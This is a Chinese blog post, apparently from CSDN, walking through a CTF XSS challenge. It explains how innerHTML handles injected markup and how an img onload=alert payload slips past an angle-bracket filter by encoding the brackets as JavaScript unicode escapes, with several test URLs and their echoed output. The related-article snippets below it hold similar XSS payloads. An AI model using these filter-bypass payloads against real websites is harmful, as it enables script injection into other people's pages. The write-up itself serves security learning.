CTF/CTF练习平台-XSS【xss注入及js unicode编码及innerHTML】

最新推荐文章于 2024-07-31 12:18:55 发布
最新推荐文章于 2024-07-31 12:18:55 发布
阅读量1.7w 收藏 7
点赞数 2
文章标签: xss ctf web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wy_97/article/details/77755098
版权

原题内容:

 

http://103.238.227.13:10089/

Flag格式:Flag:xxxxxxxxxxxxxxxxxxxxxxxx

 

题目有点坑啊,注入点都没说明,去群里问的,这题注入点为id(get方式),id的值会进行替换后进入s

 

补充了这个,好了,继续做题

右键源码

 

<script>
	var s="";	
        document.getElementById('s').innerHTML = s;
</script>


结合上述补充,和题目要求

 

 

1、请注入一段XSS代码,获取Flag值

2、必须包含alert(_key_),_key_会自动被替换

 

 

 

首先,解释下源码中发现的代码的意思,下面举个例子说明下innerHTML

 

<a id="baidu"><strong>百度</strong></a>

document.getElementById("baidu") 获得 a 这个元素
document.getElementById("baidu") .innerHTML 获得 a 这个元素内的HTML代码(即<strong>百度</strong>)
document.getElementById("baidu") .innerHTML = "<em>谷歌</em>" 
设置 a 这个元素内的HTML代码,
设置后<strong>百度</strong>
就变为<em>谷歌</em>


搜索document.getElementById('s').innerHTML时发现一个很有趣的问题

 

如果字符串中拼接的 HTML 标签中有 script 标签,那么该段脚本是无法执行的,这并不是 bug,而是 w3c 的文档规定的

这里推荐一个博客,大家可以前去学习一下

simplify the life by 韩子迟

 

我们需要的是可以从注入点id进入的方法,所以这里参考其博客的img标签方法,于是构造

 

http://103.238.227.13:10089/?id=<img%20src=1%20onload=alert(_key_)/>

很遗憾,存在回显

 

这说明,存在xss filter,我们的传参字符串中存在被屏蔽的词

一般最可能的是alert,但这里题目要求存在alert,顾考虑第二可能点<>

进行了两组尝试,代码和回显如下:

链接

 

http://103.238.227.13:10089/?id=\%3Cimg%20src=1%20onload=alert(_key_)/\%3E

 

 

 

回显

 

<img src=1 onload=alert(_key_)/>


链接

 

 

http://103.238.227.13:10089/?id=\\%3Cimg%20src=1%20onload=alert(_key_)/\\%3E


回显

 

 

\<img src=1 onload=alert(_key_)/\>


很明显了,反义符号对<>不起作用,对本身起作用,这说明阻挡点是<>

 

注意页面编码utf-8

id传入代码会在s中运行

考虑将<>进行unicode编码,这样当代码被替换进去运行时,utf-8编码又会将其变回来

具体表参考博客

unicode字符集特殊符号对应html/js/css符号

接下来就没问题了

构造链接

 

http://103.238.227.13:10089/?id=\u003cimg%20src=1%20onload=alert(_key_)/\u003e


查看源代码,可看到_key_已经被替换成答案

 

 

 

 

var s="\\<img src=1 onload=alert(_key_)/\\>";	document.getElementById('s').innerHTML = s;

 

 

 

 

 

 

 

 

 

Sp4rkW
关注
专栏目录
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
web-ctfctf-pikachu-XSS
一个努力生活的人的博客
06-27 2539
XSS-pikachu
CTF 【每日一题20160618】简单xss示例
hhhparty的博客
06-18 7498
继续黑客游戏 第五关 复杂的文字游戏 点一下have a try 下面一行后那个回车 并有弹出消息框 分析:这是要考XSS,右侧还提示“会用错误控制台么?”,这个是提示用chrome的console(按F12调用)。 首先看一下源码,发现里面有一段手写脚本(编码风格一般较差的那种),似乎是网页程序员留下的: 他们说输入的地方就是攻击的开始
五分钟带你了解XSS攻击!
最新发布
ORANGE_3iING的博客
07-31 1065
跨站脚本攻击(XSS) 是一种,它允许攻击者。此代码由用户执行,让攻击者并冒充用户。如果 Web 应用程序没有采用足够的,则这些攻击会成功。用户的浏览器无法检测到恶意脚本是不可信的,因此允许其访问任何 Cookie、会话令牌或其他特定于站点的敏感信息,或者让恶意脚本重写 HTML 内容。
ctf中文转unicode_CTF/CTF练习平台-XSSxss注入js unicode编码innerHTML
weixin_30842027的博客
02-23 370
原题内容:javascripthttp://103.238.227.13:10089/cssFlag格式:Flag:xxxxxxxxxxxxxxxxxxxxxxxxhtml题目有点坑啊,注入点都没说明,去群里问的,这题注入点为id(get方式),id的值会进行替换后进入sjava补充了这个,好了,继续作题xss右键源码学习var s="";document.getElementById('s')....
ctf xss利用_一道XSS题目分析
weixin_39960147的博客
01-14 1242
目录0x00 介绍题目地址:https://challenge.intigriti.io/题目的要求是绕过CSP实现XSS,执行alert(document.domain)。0x01 解决页面中加载了个script.js:varhash=document.location.hash.substr(1);if(hash){displayReason(hash);}document.getEle...
CTF-WebXSS漏洞学习笔记(附ctfshow web316-333题目)
jayq1的博客
06-07 2318
XSS
CTFhub之xss漏洞
weixin_46954909的博客
05-15 805
前期了解:上半部分是用户执行的操作,下半部分是模拟服务器的操作。
innerHTMLXSS攻击
hhhh
04-30 4220
HTML5为所有元素提供了一个innerHTML属性,既能获取对象的内容又能向对象插入内容 属性值:HTML标签/文本 浏览器会将属性值解析为相应的DOM树 HTML解析器在浏览器中是底层代码比JavaScript方法快很多,同时意味着替换元素上的关联事件处理程序和JavaScript对象需要手动删除。 插入script和style元素的时候需要看具体的浏览器 XSS攻击 outerHTML ==innerHTML定义的DOM树+自身元素 innerText与outerHTML: innerText:后代
CTF-Web-XSS
beihai2013
02-03 772
XSS靶机 level1 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> ## 若执行了alert,则执行以下语句 window.alert = function() { confirm("完成的不错!"); window.loc
CTF特训营》——跨站脚本攻击(XSS
PICACHU+++的博客
07-15 2344
跨站脚本攻击简称XSS,是一种网站应用程序漏洞,是代码注入漏洞的一种,攻击者可以通过这个漏洞向网页中注入恶意代码,导致用户浏览器加载网页、渲染HTML文档时执行攻击者代码。反射型XSS,存储型XSS,DOM型XSS输出在HTML属性中,输出在CSS代码中,输出在JavaScript中.......................................
unicode绕过过滤触发XSS
一米八多的瑞兹的博客
03-07 886
unicode绕过过滤触发XSS 1. unicode介绍 Unicode(统一码、万国码、单一码)是计算机科学领域里的一项业界标准,包括字符集、编码方案等。Unicode 是为了解决传统的字符编码方案的局限而产生的,它为每种语言中的每个字符设定了统一并且唯一的二进制编码,以满足跨语言、跨平台进行文本转换、处理的要求。 使用python将字符转换为unicode类型。 2. XSS挖掘 构造无害独一字符串,在响应在寻找该字符串。 3. 双斜杠+unicode绕过 4. Payload触发XSS Payl
BUUCTF XSS闯关1
m0_74167420的博客
04-18 2029
使用'1闭合后面的单引号,当然也可以使用"//"将其注释,最终 username = alert(1);这段代码是一个简单的JavaScript脚本,其中包含一个alert函数调用,用于显示一个弹出框,内容为"xss"。javascript:alert(1),浏览器会把javascript后面的内容当做代码执行,直接在当前页面执行。所以执行:autosubmit=1&action=JavaScript:alert(1);
XSS-Lab(XSS注入笔记1-16)
小谢的博客
10-29 5118
XSS-Lab(XSS注入笔记1-16)
对于xss等有关的html,url,unicode编码做的一个小总结。
weixin_30385925的博客
08-05 781
参考:http://bobao.360.cn/learning/detail/292.html,算是对前部分作一个总结性的学习。 1<a href="%6a%61%76%61%73%63%72%69%70%74:%61%6c%65%72%74%28%31%29"></a> URL 编码 "javascript:alert(1)" JavaScript是个伪协议,对协议...
浅谈javascript注入攻击
qq_41914181的博客
10-17 1万+
前言 记录一次防止js注入的项目经历,起因,项目在测试过程中,发现可能存在注入可能,于是拿到代码开始查看,因为现在前后端分离的情况下,需要特殊处理避免XSS攻击(跨站脚本攻击)的情况已经很少了,所以这次情况引起了我的兴趣。 介绍 什么是javascript注入攻击?简单来说,就是页面上输入的内容中带有可执行的javascript,而你使用这段输入内容的时候,让这段用户提供的代码执行了,也就是你写的代码,执行了非你写的代码,就会导致网页的不可行乃至更严重的安全威胁。 传统页面的服务端渲染 因为传统页面基本都是
关于HTML 代码注入XSS攻击问题解决
热门推荐
帅大叔的博客
10-19 3万+
大部分的网站一般都有评论功能或留言功能,或类似可以让用户写东西的地方。如果后台不经过处理,又把数据返回前端,这就会出问题了。网页解析器会把用户的信息也当成html代码给解析了。如果用户写的是一些恶意的 js 脚本这是很危险的。专业术语叫:XSS 攻击一、举个例子:假设后台和前台都没有对用户的信息,进行处理。我们输入如下的代码:<script> var body= document.body;
CTF一些入门题目的wp(一)
qq_41788666的博客
05-25 1676
1. XSS注入测试 题目链接(http://103.238.227.13:10089)        进入网页后发现        由题目原先的提示得知注入点为id(GET方法),查看网页源代码,发现如下代码         猜测应该是将s赋值为用户传上去的id的值        innerHTML无法执行进来的script  可以构造img标签来使script执行        测试一波:ht...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值